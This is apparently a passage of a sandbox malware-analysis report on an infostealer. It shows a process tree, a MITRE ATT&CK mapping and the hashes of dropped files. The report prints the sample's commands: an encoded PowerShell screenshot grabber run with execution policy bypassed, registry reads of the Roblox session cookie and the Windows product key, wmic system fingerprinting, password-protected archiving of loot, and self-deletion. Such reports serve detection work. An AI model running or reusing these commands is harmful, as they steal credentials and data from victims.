AAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1888
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5508
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\okhyf3tz\okhyf3tz.cmdline"
        5⤵
        
        PID:5996
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8335.tmp" "c:\Users\Admin\AppData\Local\Temp\okhyf3tz\CSC273E14E8BD764BCDBBFF984C79A69041.TMP"
        6⤵
        
        PID:4724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5452
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5680
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5804
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5880
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6016
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:6044
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2380
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5132
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2176"
    3⤵
    PID:5404
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2176
      4⤵
      Kills process with taskkill
      PID:5588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2176"
    3⤵
    PID:5716
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2176
      4⤵
      Kills process with taskkill
      PID:60
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3120"
    3⤵
    PID:5428
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3120
      4⤵
      Kills process with taskkill
      PID:5820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3120"
    3⤵
    PID:5468
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3120
      4⤵
      Kills process with taskkill
      PID:5500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2028"
    3⤵
    PID:5700
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5680
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2028
      4⤵
      Kills process with taskkill
      PID:5488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2028"
    3⤵
    PID:5104
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2028
      4⤵
      Kills process with taskkill
      PID:2860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1388"
    3⤵
    PID:5976
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1388
      4⤵
      Kills process with taskkill
      PID:3784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1388"
    3⤵
    PID:5880
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1388
      4⤵
      Kills process with taskkill
      PID:6060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4068"
    3⤵
    PID:6064
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4068
      4⤵
      Kills process with taskkill
      PID:1096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4068"
    3⤵
    PID:3932
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4068
      4⤵
      Kills process with taskkill
      PID:5132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4508"
    3⤵
    PID:1724
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4508
      4⤵
      Kills process with taskkill
      PID:5160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5916
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4508"
    3⤵
    PID:3060
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4508
      4⤵
      Kills process with taskkill
      PID:3132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2528
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5584
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:6076
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28402\rar.exe a -r -hp"rat" "C:\Users\Admin\AppData\Local\Temp\7GJ6l.zip" *"
    3⤵
    PID:836
  - - C:\Users\Admin\AppData\Local\Temp\_MEI28402\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI28402\rar.exe a -r -hp"rat" "C:\Users\Admin\AppData\Local\Temp\7GJ6l.zip" *
      4⤵
      Executes dropped EXE
      PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3216
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:5776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:5360
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:6004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5892
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5240
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\matrix.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4900
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4248,i,15436195446242760253,4000484513008731869,262144 --variations-seed-version --mojo-platform-channel-handle=1760 /prefetch:8
1⤵
PID:4508

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b736b1cf455023520eb7abb7f35ddaa2

SHA1
f3d04d1c5d14eb92c1e466ee4767ea65680b4070

SHA256
3530522d67a50208cbc38ada3fc1ce9c3f858488e1573e2cf1da6748040b8849

SHA512
5bff0ecabba8d72a06456a54911e623e519b4ed78d21e32de94cfae5e21636f46e5134c95abd184b43fec7fd2fd0a12087a330eb3cd41cb5507db4a1996c5158

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8335.tmp

Filesize
1KB

MD5
24fe4a7b97e646cb14cc06d9f35678ba

SHA1
e96c6ff3754392cec353cdadfee3e2b521f59933

SHA256
2277a8f8bcb60b50102b0fe304d1d9eb34532671d31fd23aede6945e152a7752

SHA512
5871c2f128c3be8f7740226a3cff36ec190cf864fe96c18ba3f58d7bcd93af5636bfbcf69cb8313da7f8c32ab086057ab183768506c4ecdca39d61e6fa4e5beb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28402\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28402\_bz2.pyd

Filesize
48KB

MD5
3bd0dd2ed98fca486ec23c42a12978a8

SHA1
63df559f4f1a96eb84028dc06eaeb0ef43551acd

SHA256
6beb733f2e27d25617d880559299fbebd6a9dac51d6a9d0ab14ae6df9877da07

SHA512
9ffa7da0e57d98b8fd6b71bc5984118ea0b23bf11ea3f377dabb45b42f2c8757216bc38ddd05b50c0bc1c69c23754319cef9ffc662d4199f7c7e038a0fb18254

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28402\_ctypes.pyd

Filesize
58KB

MD5
343e1a85da03e0f80137719d48babc0f

SHA1
0702ba134b21881737585f40a5ddc9be788bab52

SHA256
7b68a4ba895d7bf605a4571d093ae3190eac5e813a9eb131285ae74161d6d664

SHA512
1b29efad26c0a536352bf8bb176a7fe9294e616cafb844c6d861561e59fbda35e1f7c510b42e8ed375561a5e1d2392b42f6021acc43133a27ae4b7006e465ba8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28402\_decimal.pyd

Filesize
107KB

MD5
8b623d42698bf8a7602243b4be1f775d

SHA1
f9116f4786b5687a03c75d960150726843e1bc25

SHA256
7c2f0a65e38179170dc69e1958e7d21e552eca46fcf62bbb842b4f951a86156c

SHA512
aa1b497629d7e57b960e4b0ab1ea3c28148e2d8ebd02905e89b365f508b945a49aacfbd032792101668a32f8666f8c4ef738de7562979b7cf89e0211614fa21a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28402\_hashlib.pyd

Filesize
35KB

MD5
d71df4f6e94bea5e57c267395ad2a172

SHA1
5c82bca6f2ce00c80e6fe885a651b404052ac7d0

SHA256
8bc92b5a6c1e1c613027c8f639cd8f9f1218fc4f7d5526cfcb9c517a2e9e14c2

SHA512
e794d9ae16f9a2b0c52e0f9c390d967ba3287523190d98279254126db907ba0e5e87e5525560273798cc9f32640c33c8d9f825ff473524d91b664fe91e125549

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28402\_lzma.pyd

Filesize
86KB

MD5
932147ac29c593eb9e5244b67cf389bb

SHA1
3584ff40ab9aac1e557a6a6009d10f6835052cde

SHA256
bde9bccb972d356b8de2dc49a4d21d1b2f9711bbc53c9b9f678b66f16ca4c5d3

SHA512
6e36b8d8c6dc57a0871f0087757749c843ee12800a451185856a959160f860402aa16821c4ea659ea43be2c44fcdb4df5c0f889c21440aceb9ee1bc57373263c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28402\_queue.pyd

Filesize
25KB

MD5
0e5997263833ce8ce8a6a0ec35982a37

SHA1
96372353f71aaa56b32030bb5f5dd5c29b854d50

SHA256
0489700a866dddfa50d6ee289f7cca22c6dced9fa96541b45a04dc2ffb97122e

SHA512
a00a667cc1bbd40befe747fbbc10f130dc5d03b777cbe244080498e75a952c17d80db86aa35f37b14640ed20ef21188ea99f3945553538e61797b575297c873f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28402\_socket.pyd

Filesize
43KB

MD5
2957b2d82521ed0198851d12ed567746

SHA1
ad5fd781490ee9b1ad2dd03e74f0779fb5f9afc2

SHA256
